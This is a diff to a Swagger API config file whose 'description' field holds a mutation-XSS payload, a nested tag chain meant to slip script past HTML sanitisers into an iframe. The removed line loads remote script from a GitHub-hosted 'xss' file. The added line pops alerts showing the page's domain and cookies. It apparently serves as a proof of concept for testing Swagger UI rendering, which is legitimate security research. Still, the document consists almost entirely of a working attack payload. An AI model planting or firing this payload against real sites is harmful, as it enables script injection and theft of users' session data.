--- a/config2.yaml
+++ b/config2.yaml
@@ -1,7 +1,7 @@
 swagger: '2.0'
 info:
   title: Classic API Resource Documentation
-  description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><desc id="</textarea><math><mtext><!--"><textarea id="--><iframe srcdoc="<script><script src=//raw.githubusercontent.com/mrvredteam/xss/main/xss></script>">
+  description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><desc id="</textarea><math><mtext><!--"><textarea id="--><iframe srcdoc="<script><script>alert(document.domain);alert(document.cookies)</script>">
   version: production
 basePath: /JSSResource/
 produces:
